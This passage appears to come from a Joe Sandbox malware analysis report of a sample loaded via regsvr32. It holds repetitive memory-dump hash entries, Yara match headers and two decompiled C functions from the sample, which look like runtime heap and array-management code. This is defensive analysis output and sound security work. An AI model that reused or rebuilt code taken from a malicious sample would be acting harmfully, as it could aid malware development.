                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 2|
                                                                                                                                                                                                            • API String ID: 0-4112153497
                                                                                                                                                                                                            • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                            • Instruction ID: 3451d35b5e069293cb25047193449685d5cdf1edf4b5f1c720bab5b15fb8f21c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD31E3715183408FD768DF28C58A54BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: v)v
                                                                                                                                                                                                            • API String ID: 0-2248367734
                                                                                                                                                                                                            • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                            • Instruction ID: 9621d4cd7b8247f7edff4d500ba0973206047cb8445dacb43466fd858fc2c44a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C631FEB0D106189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7795A45CF68
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: b
                                                                                                                                                                                                            • API String ID: 0-1908338681
                                                                                                                                                                                                            • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                            • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Y
                                                                                                                                                                                                            • API String ID: 0-579211002
                                                                                                                                                                                                            • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                            • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0}
                                                                                                                                                                                                            • API String ID: 0-2955618701
                                                                                                                                                                                                            • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                            • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: S}
                                                                                                                                                                                                            • API String ID: 0-4277866985
                                                                                                                                                                                                            • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                            • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 6N
                                                                                                                                                                                                            • API String ID: 0-1503784733
                                                                                                                                                                                                            • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                            • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: H-
                                                                                                                                                                                                            • API String ID: 0-1037293833
                                                                                                                                                                                                            • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                            • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: u*AR
                                                                                                                                                                                                            • API String ID: 0-611844632
                                                                                                                                                                                                            • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                            • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: g*`
                                                                                                                                                                                                            • API String ID: 0-1142845859
                                                                                                                                                                                                            • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                            • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: n*=
                                                                                                                                                                                                            • API String ID: 0-1578461029
                                                                                                                                                                                                            • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                            • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 5$
                                                                                                                                                                                                            • API String ID: 0-3756733592
                                                                                                                                                                                                            • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                            • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000A878(long long __rax) {
                                                                                                                                                                                                            				signed int _t3;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t3 = GetProcessHeap();
                                                                                                                                                                                                            				 *0x800227e8 = __rax;
                                                                                                                                                                                                            				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                                                                                                                            			}




                                                                                                                                                                                                            0x18000a87c
                                                                                                                                                                                                            0x18000a885
                                                                                                                                                                                                            0x18000a893

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                            • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                            • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                            • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                            • Instruction ID: d463d3d80b127674357ea6a63587cce6720ed7c41d0426c7689e38ba01ceb260
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED51E474518788CBDBBADF28C8992D97BB1FB58304F90861DD84E8E290DB789749CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                            			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                            				int _t26;
                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                            				signed long long _t66;
                                                                                                                                                                                                            				signed long long _t74;
                                                                                                                                                                                                            				signed long long _t76;
                                                                                                                                                                                                            				signed long long _t77;
                                                                                                                                                                                                            				signed int* _t90;
                                                                                                                                                                                                            				signed long long _t95;
                                                                                                                                                                                                            				signed long long _t96;
                                                                                                                                                                                                            				signed long long _t98;
                                                                                                                                                                                                            				signed long long _t104;
                                                                                                                                                                                                            				long long _t115;
                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                            				void* _t120;
                                                                                                                                                                                                            				signed long long* _t123;
                                                                                                                                                                                                            				signed long long _t124;
                                                                                                                                                                                                            				signed long long _t126;
                                                                                                                                                                                                            				signed long long _t129;
                                                                                                                                                                                                            				signed long long*** _t132;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t52 = __edi;
                                                                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                                                                            				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                                                                                                                            				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                                                                                                                            				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                            				_t132 = __rcx;
                                                                                                                                                                                                            				_t90 =  *_t66;
                                                                                                                                                                                                            				if (_t90 == 0) goto 0x800069ac;
                                                                                                                                                                                                            				_t124 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				_t111 = _t124 ^  *_t90;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				_t74 = _t124 ^ _t90[4];
                                                                                                                                                                                                            				asm("dec ecx");
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
                                                                                                                                                                                                            				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                                                                                                                            				_t101 =  >  ? _t66 : _t76;
                                                                                                                                                                                                            				_t6 = _t115 + 0x20; // 0x20
                                                                                                                                                                                                            				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                            				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                            				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                                                                                                                                            				_t7 = _t115 + 8; // 0x8
                                                                                                                                                                                                            				r8d = _t7;
                                                                                                                                                                                                            				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                                                                                                                            				_t24 = E0000000118000878C(_t66, _t111);
                                                                                                                                                                                                            				if (_t66 != 0) goto 0x800068e2;
                                                                                                                                                                                                            				_t104 = _t76 + 4;
                                                                                                                                                                                                            				r8d = 8;
                                                                                                                                                                                                            				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                                                                                                                            				_t129 = _t66;
                                                                                                                                                                                                            				_t26 = E0000000118000878C(_t66, _t111);
                                                                                                                                                                                                            				if (_t129 == 0) goto 0x800069ac;
                                                                                                                                                                                                            				_t123 = _t129 + _t76 * 8;
                                                                                                                                                                                                            				_t77 = _t129 + _t104 * 8;
                                                                                                                                                                                                            				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                            				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                            				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                                                                                                                                            				memset(_t52, _t26, 0 << 0);
                                                                                                                                                                                                            				_t126 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				r8d = 0x40;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                                                                                                                            				_t95 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                                                                                                                            				_t96 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                                                                                                                            				_t98 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				( *( *_t132))[2] = _t77 ^ _t98;
